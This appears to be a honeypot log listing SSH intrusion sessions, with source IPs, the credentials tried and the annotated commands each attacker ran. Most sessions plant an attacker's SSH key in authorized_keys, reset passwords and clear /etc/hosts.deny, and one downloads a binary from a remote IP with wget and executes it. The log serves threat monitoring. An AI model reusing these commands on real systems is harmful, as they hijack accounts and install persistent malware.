$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 roo_root (20.92.245.19) β€” The Rocks, Australia Β· 1 session Β· 19 cmds
2026-06-06 08:35 EDT Β· as root/Admin@123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:HgbndPC7AbTs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_2 (156.239.253.250) β€” Los Angeles, United States Β· 2 sessions Β· 40 cmds
2026-06-06 07:33 EDT Β· as adtest/123456, maths/maths
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\ny1mxDLDNTOes\ny1mxDLDNTOes"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\ny1mxDLDNTOes\ny1mxDLDNTOes\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "maths\nvHa6S4cSi3YH\nvHa6S4cSi3YH"|passwd|bash
$ echo "maths\nvHa6S4cSi3YH\nvHa6S4cSi3YH\n"|passwd
🎭 burger (35.208.7.216) β€” Council Bluffs, United States Β· 1 session Β· 20 cmds
2026-06-06 07:21 EDT Β· as adtest/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nhcCAIxRywmuE\nhcCAIxRywmuE"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nhcCAIxRywmuE\nhcCAIxRywmuE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon (113.249.111.82) β€” Chongqing, China Β· 1 session Β· 20 cmds
2026-06-06 07:19 EDT Β· as honduras/honduras123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "honduras123\nYRp0NZGPeWPX\nYRp0NZGPeWPX"|passwd|bash
$ Enter new UNIX password:
$ echo "honduras123\nYRp0NZGPeWPX\nYRp0NZGPeWPX\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle (192.3.196.157) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-06-06 07:06 EDT Β· as skyrama/skyrama123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "skyrama123\nl5vclENxNUpC\nl5vclENxNUpC"|passwd|bash
$ Enter new UNIX password:
$ echo "skyrama123\nl5vclENxNUpC\nl5vclENxNUpC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade (124.174.92.23) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-06-06 07:02 EDT Β· as jon/jon123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jon123\n2JYRkGF1Ts47\n2JYRkGF1Ts47"|passwd|bash
$ Enter new UNIX password:
$ echo "jon123\n2JYRkGF1Ts47\n2JYRkGF1Ts47\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_33 (124.40.252.3) β€” Boyolali, Indonesia Β· 1 session Β· 20 cmds
2026-06-06 05:43 EDT Β· as webadmin/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345\nYD6xVKsmIltQ\nYD6xVKsmIltQ"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\nYD6xVKsmIltQ\nYD6xVKsmIltQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_2 (4.224.81.31) β€” Pune, India Β· 1 session Β· 19 cmds
2026-06-06 04:52 EDT Β· as root/asdf1234@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2LbIraNuMlLI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_7 (111.22.20.115) β€” Qingyuan, China Β· 1 session Β· 1 cmd
2026-06-06 02:13 EDT Β· as root/fjbdfdjkdsfs541544
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 cipher_root_34 (58.71.87.210) β€” Pasig, Philippines Β· 1 session Β· 9 cmds
2026-06-06 01:29 EDT Β· as root/Qwerty1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,93Y89N1V3E7IESE1H -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 rogue_8 (62.193.91.121) β€” Zagazig, Egypt Β· 1 session Β· 20 cmds
2026-06-06 00:29 EDT Β· as micro/micro
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "micro\n2XBRGpR13TK7\n2XBRGpR13TK7"|passwd|bash
$ Enter new UNIX password:
$ echo "micro\n2XBRGpR13TK7\n2XBRGpR13TK7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_5 (123.58.212.28) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-05 23:47 EDT Β· as dev/Welcome@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Welcome@2025\nRNsUgrxMbp1Z\nRNsUgrxMbp1Z"|passwd|bash
$ Enter new UNIX password:
$ echo "Welcome@2025\nRNsUgrxMbp1Z\nRNsUgrxMbp1Z\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_8 (183.220.37.203) β€” Chengdu, China Β· 1 session Β· 1 cmd
2026-06-05 23:31 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 silk_root_10 (106.12.151.23) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-06-05 21:00 EDT Β· as root/h3c.com!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 eagle_root_19 (43.159.177.40) β€” Santa Clara, United States Β· 3 sessions Β· 59 cmds
2026-05-24 14:09 EDT Β· as bareos/bareos, git/123, root/Cc123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\nT3i2XnJy2wXJ\nT3i2XnJy2wXJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nT3i2XnJy2wXJ\nT3i2XnJy2wXJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "bareos\neHUiwnHK6FoW\neHUiwnHK6FoW"|passwd|bash
$ echo "bareos\neHUiwnHK6FoW\neHUiwnHK6FoW\n"|passwd
$ echo "root:NZSwipCIznWT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 jade_root_5 (101.96.195.62) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-06-05 18:41 EDT Β· as tester/admin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin\naVkQZTv82WK0\naVkQZTv82WK0"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\naVkQZTv82WK0\naVkQZTv82WK0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_6 (14.103.63.16) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-06-05 18:33 EDT Β· as root/@Qq123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:99LAsb4XKcx9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_9 (117.187.180.20) β€” Jinrongjie, China Β· 1 session Β· 20 cmds
2026-06-05 18:28 EDT Β· as astra/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nzgYzeYkhxAp2\nzgYzeYkhxAp2"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nzgYzeYkhxAp2\nzgYzeYkhxAp2\n"|passwd
